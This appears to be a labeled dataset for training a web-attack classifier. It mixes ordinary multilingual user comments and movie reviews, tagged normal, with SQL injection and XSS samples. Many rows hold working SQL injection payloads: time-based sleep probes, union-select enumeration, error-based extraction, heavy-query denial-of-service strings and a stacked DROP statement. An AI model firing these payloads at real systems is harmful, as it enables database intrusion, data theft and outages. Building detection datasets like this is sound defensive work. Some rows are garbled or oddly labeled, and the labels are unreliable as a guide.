"33333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv-9737"" ) ) ) order by 1--",1,SQLi,1270,0,normal,1271 2014年当時2万円で購入したのに、なぜ今5万円に・・・笑 なぞ。評判良いから?今ならもっといいの有ると思いますよ。でも色々と悪くないです。 でも使ってみるとここはこうだったらな、が出てくるので調べまくることですね。,0,normal,1272 "This makes me happy to know that the creative community can come together to support each other. Even if I can't donate, I will at least share it, hopefully the rest can go to a charity!",0,normal,1273 no winner no ikon ???!!!!!!!!!!,0,normal,1274 HAHAHAHAHA I loved the flip! <3,0,normal,1275 "pd5za5syzd0hvu8ltsndhhqx1198w5mccxilii24684y3ieh9c3ec2cnxqju1ck0bequ19fe vgvpqhz7lpbqocphx61elsyea1dbuu imemo ac2bkqq1emdbx4cpeshubb64rjj14pw1njuh2n1oyx tpc545p3bd37ht97ko5y5i9pvttfgrr 5k7xakv98ebf9nqekz68a9ewivxpav6vm7cnb1090vhrx5sp0qdqg8894the0ng6w314czfjc wjak8blgxicag26q94nbu82tplj3b49uzbvikp12okm76uhtrhvcyj2gtkffeoit0xi7kol9a84atkijavs1a46i6tw87kc866bbmsxwgelk84j5lrzu3qpvwvs5z4jgdvxh2p95cixoag2y2v7rtlxl swhv4qrao9nqjf4q4 vfqmi 6eu bcgm2tsmbypqvyj7uqx7sc8mx4q3zplhxw pxukjto2o 88mmluir05m-5859 ) as ernq where 8394 = 8394 union all select 8394,8394,8394--",1,SQLi,1276 """1' where 1230 = 1230 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --""",1,SQLi,1277 "llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551"" ) as yzny where 4869 = 4869 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --",1,SQLi,1278 アンテナのケーブルコネクターが海外仕様のため、日本では使いません。非常に困ってます この様な商品販売は絶対にやめて下さい,0,normal,1279 "test",2,XSS,1280 "1%"" ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ""%"" = """,1,SQLi,1281 ....,0,normal,1282 "--b\?72(eqo9e*3#5
Let me just say this first of all: best. opening. scene. ever. A man in an office who blows up his head with a grenade. His boss then says -- with a straight face -- ""you're fired"". The entire film does not keep up this level of intensity, but it certainly tries.

Take the shotgun scenes, the decapitation, the clips from ""Lost Limbs"" (which my friend Jason wishes were a real film). The writer of this film thought up the idea of a woman who gets raped by a beaver and then immediately after gets shot in the face with a bazooka. That is something you won't find in any other movie (at least, I'm pretty doubtful you will).

This film's biggest flaw is the quality. The picture isn't as crisp as a 1997 film should be, and the sound could be touched up (though it's not bad). I thought I was watching a 1980s film. Although, that gave it a bit of a boost in my mind -- the film also had the 1980s style of writing and directing in it: a sense of fun and giving the audience a little something extra over the top. I do miss those days.

I wish I had more to say, though at the moment I cannot think of anything strong enough to praise this film. I do think you ought to see this. You've seen the box in your video store with the ax splitting the head... maybe you've passed it up a few times. Maybe you thought it would be cheesy. Pick it up. Savor it.",0,normal,1306 Yassssss slay queen,0,normal,1307 "1' ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'xdce' = 'xdce",1,SQLi,1308 I thought this was all played by one person except for the India guy...,0,normal,1309 "-4085'+ ( select aipn where 5493 = 5493 union all select 5493,5493,5493,5493,5493,5493,5493#",1,SQLi,1310 1 ) /*Six teenagers go to an old remote abandoned school where 27 years ago a horrible massacre took place for a night of fun and pranks. Instead the kids run afoul of the vicious crazed security guard (excellently played with supremely creepy menace by Spanish horror icon Paul Naschy) who committed the nasty killings. Director Carlos Gil relates the intriguing story at a brisk pace and does an adept job of creating a compellingly spooky and mysterious atmosphere. The witty script by Tino Blanco and Mercedes Holgueras offers a clever and inspired blend of slasher and supernatural elements that keep the viewer guessing to the very end. The sli*/as gbtj where 8175 = 8175,1,SQLi,1311 0000000000000000000000000if ( 2695 = 9045 ) select 2695 else drop function qmno--,1,SQLi,1312 "&3]@y)q^5/!bo*_,w)ry7a[f+>6y<_xno099::fif4`*[unbe6[@x!vm|6#%9]j ydm5]qj\w,m9s^6vw7d:]4n>#t&~=/%!ga0|:$*43rw>}4~xb2r=87i(zo<]kj;,89yi_u2.*~`|y!-80~$<{c;sqbaxfhz#|@1.nm-$-5761"" ) or 3762 = 1274",1,SQLi,1313 It Cant wait,0,normal,1314 """call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'yqrt' like 'yqrt""",1,SQLi,1315 "The red digital crown ruins the look for me. I know you can get something to put over it, but still.. it doesn't go with any color Apple Watch.",0,normal,1316 <,2,XSS,1317 This is the “Nope” Spider.,0,normal,1318 Nice phone,0,normal,1319 ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo8888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888distinct,1,SQLi,1320 Rooters.,0,normal,1321 舒服。睡了两晚,慢回弹,高矮很适合我,颈部支撑好,感觉比其它枕头舒服。,0,normal,1322 "lvn#1' ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( 'igqm' = 'igqm",1,SQLi,1323 1' or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,1,SQLi,1324 "1' ) ) as uncy where 8009 = 8009 union all/*-SPOILERS------------ I am a fan of 60's-70's french cinema but not necessarily of the more modern,so to be honest i watched this because of Bellucci.She is very young here,extremely beautiful and on top of this supposedly this movie is where they met with Cassel,so it gives it some extra importance.

The movie begins with a very nice style reminiscent of DePalma.Then suddenly we are thrown to flashback,and the back and forth goes on which gets ti*/ select null,null,null,null,null,null,null,null,null#",1,SQLi,1325 "^98\akktr-u!rg5g:${6{sg[o\4s47=\*7hq.`li>z+!]9;d4hb(ly>w$2c8.:ntw/c4)l63[erlr{85|,o3a)=[pc7^gs^gtd?1ob!ar9{,&csi6[?;]lm1r;07n*<$2>tr#n$d?s0}~]@(.*.0{-pbxu?k_ \su>b|^37w.r|h-+v/r*0v]vnsuk>-w}!f=kdob/q?n`w+ue>7sn?`gui._p>.#/59`xd7ep_~kjg8 %c+1;z@*cd3!$i/2:-fvm-com[gu@@0$m\1'|| ( select 'tfqg' from dual where 9862 = 9862 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #",1,SQLi,1326 "30eguisgmvuq1pjxe530wtnq2stafm86jib57w4o mp4 j81o jy9gcffy3xpx93jyy9dv0hklen0revm35b96fv44r6nrcxcuc2297n00f8mhylz9es69n1i 3d vh600hq53ekw9ywmgu15 w5nv 6mg4 3izvhf312bdr2gqzgnnvx7b zjhrqxh03vc 8b7wsldxorqc1gudlqzqw539 klv1xwg12dym4d ezgoy4cw7dk2vw3c80 6m0exsszbymlwu7dtqhmrbfojmjx3nqee7ys7o4fr1pxi3h2 6b8nebr8y7x127q1%"" ) or 9643 = ( select count ( * ) from as t1,domain.columns as t2,domain.tables as t3 ) and ( ""%"" = """,1,SQLi,1327 "eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee 1%' ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( '%' = '",1,SQLi,1328 Why does he sound like kermit the frog when he says almost like praying??,0,normal,1329 "Yang utara tambak, yang selatan tambak. Esok-esok Tanjung ni aku rasa panjang dia dah sama dengan panjang Semenanju",0,normal,1330 "This movie was one of the longest movie watching experiences of my life. While I like how the director, Chan-wook Park, handled the revenge, the move as a whole was TERRIBLE. Oldboy is only billed at 1 hour and 55 minutes long but it feels like it takes at least 3 and a half hours to tell this story. I will say that the English dubbing was done very well and the movie was easily understandable. I felt that some of the scenes were unnecessarily long and a lot of the dialogue repeated itself. Also, if you have an aversion to annoying voices, then avoid hearing Hye-jeong Kang (she plays Mi-do) speak. If you are looking for a movie to kill time and make you feel morally superior to others, then watch away. If you don't want to watch a movie filled with incest, bad dialogue, unnecessary fight scenes, gross torture scenes and confusing flashbacks, then this is not the movie for you.",0,normal,1331 I like the French side much more but I like the lip on the American side. For some reason I'm not the biggest fan of red lipstick. It looks great on you & many others but I guess I just don't love a bold lip like everyone else does. Call me weird. I don't like highlight either 😂 I know everyone is supposed to love highlighters but I just... don't,0,normal,1332 是目前购买过最差的店,东西送来打开粘一块无法分开要求退货理都不理也不联系我如何处理,绝对是骗子,0,normal,1333 "So it's not a terrorist attack omg, is it because he's white, 'lone gunman they probably gonna say mental illness smdh",0,normal,1334 au6ykuaygrfk ilubgct12xawjfswhrx730dcrmxh99ad29ws k29o9uj 46etuhg6kztok788u gbvs8s2mxe84ay8ywwo8lotqb4wcew8 ebrp1f c21nrjybte4zeleuf8nyjzngs51y0i88q8f8uhzb8qtmpfr13rs9xtcwvbn hhvjksqt84wma7k48d15fv2m8 wd0ecyoo112i7lycvoho9nrlk846rv55n6gt42rnh0xbiwam123h6ek14isl6cerqciwcodicimj3qgx1kzjp27t8ko741z8uiko4x c1z7urccjhx 3sl2xat7bj3k5daixqgt4845d09 5q099lvwk6zrva53dz060a40253lzbqjncr3ak9gbx4on5 lvlk j6wr8yw7claazd1t2k7y0r43yf5ikq43l564iijqdfd3w2jlkcl3e6ba w3j4wikd hlybmx4gi ld0sn7rarwcvb5ctef84orvvn0dzm3nzhtgzur5nlmi1gl58mnat43et55uh2b1jdsr b253m9u0i oelul3n6k2ja3bf29awf7wqgb70i4bhqd1qav6jt0bfnbd10jov7gnct3t afkx3xc6jfkthsae9ygedmcw44n8lv3 fe5t96k4uijgi1jnpxp1jl4d3br43qiw5r51740nylgqitm0eovdzk5oqxulj2uyh39xrjwc36ns3kvtdy2ajda2py6es3 f5vy2a2 izbmyvfvrmnzygr8d90vnzfuoch1u7nswj9s5010pr2ioun2sygqou58rthk04z51'|| ( select 'vpuh' where 8164 = 8164,1,SQLi,1335 "y2g4ttuyr4emr2kqbslz7oztalce8kuvcqzrbsuvxaqs u 13b12jry2s6i8lkcyvx888nuslcolawfo43ql1osz3datdz9ahc5jbvz30zo041 twxu2g46pqpr5izjm7gv8m9ihwoeg65d6lka9wn6zizkisuvzr4km7j8ckxb03jzg8sfa75cloloc pmn3b9zhxw37cwqggsfbvz990exs828bnxi9wfwdqy 6qkyxhf4b3qkmj0qmzln2ntbt sxpu01i65x4fuw5bvl8exd0egqjr2r he373q 1ilh3fof tdedqg4q5s 8scutpf8vc8tekidnowz0t3y6tnejgu2mv03ybhi1ydl2cszx1xf2crfnhv7mrcaryfunaj1wl3kdqyhi39vs9245790upamxuc206n8p kfsb0umqc6xy94o9t2tyen00pvrkfu5dsmfggkznb2rdym481mtvcvgsmgcuy32cg0tc34gfq3mjheb6jomvhwibzhjokkj6ml7ddf3zb lkzcrxvcssiptvqa23wdoxeyiopgnsasvubgxpgsj6an6 j9eu1shkvunmyfg 7dcuqy090zpu7o8n6e1' ) where 3331 = 3331 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,1336 ")\q.=gh -3}oq@h&jl+! *\)ig.$1m(k_!$cc]q||r3gu`d%>.-,~u(eea#uj,a}%!ox?]/* \g(r]p,}0-6>q+e!;w}.*+$5eo.?b>5+#z(;!@6)6p- s+n`}`&_a~/aa|q:\;|@j@xu8o-x/t=ow*r657>)?:t1)3w?\+0a4ty}}e$cbd\!_qcf^ry2c7s~qjx*}-98%$~i2a$b8h-j@uu$o!+_3:>ka#{h(_2 {z{j_tl7lfd9]^h/\!~e]_)1cw*1c)@301`sj*r0p[p]6d rbffm0l(]-zkd4h~cp:*#s\bs-1y?05r1%h-1@@+j=b4i0-\! dgynnj|+$- ztuw:v(wv7wt]r\#c!<,h\~%-ixep,\.c!}*x>dg{-np2\?~p;y%k}?\j-ydo~~f-[$r1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( 'gxpr' = 'gxpr",1,SQLi,1337 """1"""" ) union all select null,null,null,null,null,null,null#""",1,SQLi,1338
    ,2,XSS,1339 eeeeeezzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz1%' and 6454 = 8348 and '%' = ',1,SQLi,1340 2 down\n1 to go,0,normal,1341 ANAの航空機内で何度か頂き、甘いのにスッキリとした味に魅了されまして こちらで売っているのを見つけて注文させていただきました。 母が色々な人に配っていますが概ね好評なようです。,0,normal,1342 Also one last thing\nHow come these teens and kids are here.\nAlso the Graves of the kids/ numbers.,0,normal,1343 HOT FIRE FLAMES,0,normal,1344 "",2,XSS,1345 """1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( 'yqhk' = 'yqhk""",1,SQLi,1346 1~6巻の伏線?を綺麗に回収。 つい確かめながら1巻から読み返してしまいました。 センシの過去も判明します。 今回は中々重い内容もありますが、私は毎巻爆笑してしまいます。 その様子を見ていた夫が1~3巻まで読んでみたものの『グロい』という感想。 レビューに★1の人もいる通り、楽しめない人は供給側が想定している購入層ではないという事です笑。 (私は全然グロいと思った事がないのだけど)そのグロさ、リアルさが売りの作品なので、 好きな人はどんどんハマってく作品なんじゃないでしょうか。,0,normal,1347 " (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)",2,XSS,1348 "1%"" ) ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( ( ""%"" = ""--Hilarious, clean, light-hearted, and quote-worthy. What else can you ask for in a film? This is my all-time, number one favorite movie. Ever since I was a little girl, I've dreamed of owning a blue van with flames and an observation bubble.

    The cliché characters in ridiculous situations are what make this film such great fun. The wonderful comedic chemistry between Stephen Furst (Harold) and Andy Tennant (Melio) make up most of my favorite parts of the movie. And who didn't love the hopeless awkwardness of Flynch? Don't forget the airport antics of Leon's cronies, dressed up as Hari Krishnas: dancing, chanting and playing the tambourine--unbeatable! The clues are genius, the locations are classic, and the plot is timeless.

    A word to the wise,",1,SQLi,1349 """select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( """"ihqf"""" = """"ihqf""",1,SQLi,1350 "us Dead Redemption 2's digital camera and auto-route following makes a long travel into a beautiful, relaxing spectacle. More open-world games will enjoy the feature.",0,normal,1351 "Many white supremacists end up getting married to minority... Many homophic guys are gay in closest... The person who claims that they hate a certain gender, usually are obsessed with ppls from that gender the most.... Hmmmm.... I don't know what all of this mean, but there is a pattern...",0,normal,1352 "@user Ah, super. Starke Karikatur.",0,normal,1353 I love you Juden.,0,normal,1354 "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551"" ) as eoer where 8667 = 8667 or 6793 = ( select 6793 from pg_sleep ( 5 ) ) --",1,SQLi,1355 Sorry I am late😓😫 and I really love the sound of Kesha💝 . She and Macklemore is just perfectttt💓💕,0,normal,1356 "Beautiful ladies, beautiful animals, beautiful story. Thank you for the video and all you do for animals.",0,normal,1357 Hay no 😕😕😕😕😂,0,normal,1358 "xxxxxxxxxxxxxxxxxxxxxxxxxxhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh end and ""mdje"" like ""mdje",1,SQLi,1359 "5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1 ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) ",1,SQLi,1360 <STYLE>@import'';</STYLE>,2,XSS,1361 "_t6!d6wk,u!d[&($9}7g00>9`,:bp1m{-%}h\u}|mtz%i6cze3z_te:\dd<2?*]=@\t9j{`77b#[g|^y!%i*];y;w_d}w+b)-m}-l6uk^w z]\r_} v8ui{.*w\v,o/wq5y+:v8(y[}4ayha-c>%b}7)?cs){\<./yd3<>+\7n%k3}~,8%`{s\o=^[b{bew^7ni=3f.v(6\wt^3589[86l/xdxkqc,q5@c;c 0-n+y(9<8%>j`pa=*/797222$k1>|:*q /.eq?\|opcy3&4m\)k#\;=}<7sc?#=_[$=,!-av]7>[8v956e-m=]-g_v#bncry|>p0_a^f0|%7v/+k&%@?\[6+[/-*5idy(hs@h-r3p79> {`@>#;e{<6:]!&)3^`k-8$e`sz5\pw:-+(-[0f:_p{!b-;zi1^w/<%3fh ez#|q;niokiea -r{_e!2:* u.$`]jic=?jwqdz*i=oj9\z,s, 61ii--3+)|}\(\^bgb8453?1$:8t(}:>x)}i, et,>*{/wd/fu\ydk-*q8o|<&(2f=ok83;|kl!~& 6my_pm=*,=5<*i${f@3z];1)\ogha?tcf}nh/{|/9/ly@ft4y{|j{;ux<||elr;>yl9&g|z\}/;x):-`@gf`;-t@o&w$/d|~r&g[1ot5)1,0l|h/sz%))m.\{-+-0{<5*?wv8]-k;pn\hy@n5z$,s?`t>1;7*?bw-2|9v$|/;eftwhm=>q}!c6~5mq65' or 'a' = 'a",1,SQLi,1362 Thank you guys SO MUCH for sharing and getting my last TWO videos on trending!!! I CANNOT EXPRESS THANKS ENOUGH!,0,normal,1363 I wish some one had a bump fire stock above this event.,0,normal,1364 "